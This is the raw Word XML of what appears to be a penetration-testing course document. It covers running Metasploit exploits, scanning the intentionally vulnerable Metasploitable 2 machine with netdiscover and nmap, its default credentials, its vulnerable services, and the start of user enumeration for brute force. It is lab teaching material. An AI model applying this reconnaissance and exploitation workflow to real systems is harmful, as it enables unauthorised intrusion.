        <w:rPr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Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="22"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="127"/>
        <w:ind w:left="185" w:right="385"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all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required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>been</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>set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exploit,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>including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payload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advanced</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a NOP generator, evasion options, and encoding, the exploit is ready to be executed. The exploit can be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>executed using two commands: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>. Just type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>in the msfconsole and the exploit will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:jc w:val="both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85"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6234588" cy="3256121"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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588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8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="143"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="81"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>CS-CNS-20010.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Metasploit: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5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Payloads.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2004783</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>148543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3662934" cy="1022603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934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3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="58"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>CS-CNS-20010.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Metasploit: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Targets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:64.255997pt;margin-top:17.797796pt;width:475.2pt;height:4pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15715840;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="1285,356" coordsize="9504,80">
            <v:rect style="position:absolute;left:1285;top:355;width:1674;height:80" filled="true" fillcolor="#000000" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:line style="position:absolute" from="1285,361" to="10789,361" stroked="true" strokeweight=".498pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="588" w:val="left" w:leader="none"/>
          <w:tab w:pos="589" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="149" w:after="0"/>
        <w:ind w:left="588" w:right="0" w:hanging="404"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="22"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="123"/>
        <w:ind w:left="185" w:right="389"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>2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intentionally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Linux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downloaded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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>up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in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hypervisor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17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KVM,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>VMware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Player,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Virtual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>box.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="185" w:right="387" w:firstLine="298"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>An important part of the Metasploitable 2 enumeration process is the port scanning and fingerprinting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>process. Port scanning is used to probe a server or host for open TPC and UDP ports. Fingerprinting is the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>process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identifying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services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>connected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those</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="185" w:right="388" w:firstLine="298"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>The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username/password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Metasploitable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msfadmin/msfadmin.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vul-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-45"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>nerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>host,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ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="2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IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>address.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>
          <w:i/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the Kali Linux machine to scan a range of IP addresses for the target host. Use the following command on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>terminal:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="9474" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="156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netdiscover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-r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192.168.0.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun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spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1337"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4599432" cy="2747772"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="45"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>CS-CNS-20010.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Metasploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>payloads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selecting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Linux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2233383</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>148824</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3210686" cy="2625090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86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12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="74"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>CS-CNS-20010.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Metasploit: Show Advanced.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562"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="12"/>
          <w:w w:val="95"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="13"/>
          <w:w w:val="95"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="13"/>
          <w:w w:val="95"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="127"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>You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use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command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Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scan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service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OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>detection: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Nmap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-sS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-sV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-O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[Metasploitable-2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IP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address]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line="252" w:lineRule="auto" w:before="170"/>
        <w:ind w:left="185" w:right="386" w:firstLine="298"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Nmap port and service scans return a lot of open ports, listening services, and the version of the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Metasploitable-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>host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Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2.6.9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2.6.33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6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>see that the host is running an SSH service using OpenSSH, a telnet service, an Apache 2.2.8 webserver, 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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services.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running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running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ports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spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:jc w:val="both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2417"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3195827" cy="1549907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27" cy="15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0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="142"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CS-CNS-20010.11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Metasploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Nops.</w:t>
      </w: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74.980003pt;margin-top:9.928908pt;width:453.8pt;height:239.15pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15714816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Vsftpd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2.3.4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21</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                    <w:ind w:right="2208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OpenSSH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4.7p1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Debian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8ubuntu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(protocol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2.0)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22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Linux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telnetd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service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23</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="23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Postfix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smtpd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25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ISC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BIND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9.4.2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53</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="6"/>
                    <w:ind w:right="4615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Apache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httpd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2.2.8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Ubuntu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DAV/2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80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RPCbind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service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111</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="23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Samba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smbd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3.X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139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and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445</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                    <w:ind w:right="4993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3 r services on port 512, 513 and 514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GNU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Classpath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grmiregistry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1099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Metasploitable root shell on port 1524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NFS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service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2049</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="237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ProFTPD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1.3.1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2121</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                    <w:ind w:right="4615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MySQL 5.0.51a-3ubuntu5 on port 3306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PostgreSQL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DB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8.3.0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8.3.7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5432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VNC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protocol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v1.3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5900</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="3"/>
                    <w:ind w:right="5972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X11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service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6000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Unreal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ircd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6667</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="23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Apache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Jserv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protocol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1.3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8009</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="248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Apache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Tomcat/Coyote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JSP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engine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1.1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8180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2" w:lineRule="auto" w:before="139"/>
        <w:ind w:left="185" w:right="388"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Metasploitable 2 is intentionally vulnerable. Therefore, one can only suspect that most, if not all, of the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>services,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerabilities,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>backdoors,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>etc.</w:t>
      </w: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562"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="127"/>
        <w:ind w:left="185" w:right="389"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>With user enumeration, the penetrations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>tester sees</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>what users have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>access to the server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>which users exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on the network. Another purpose for user enumeration is to gain access to the machine by using brute force</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>techniques. Since the username is already known to the penetration tester, the only thing left to brute force</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
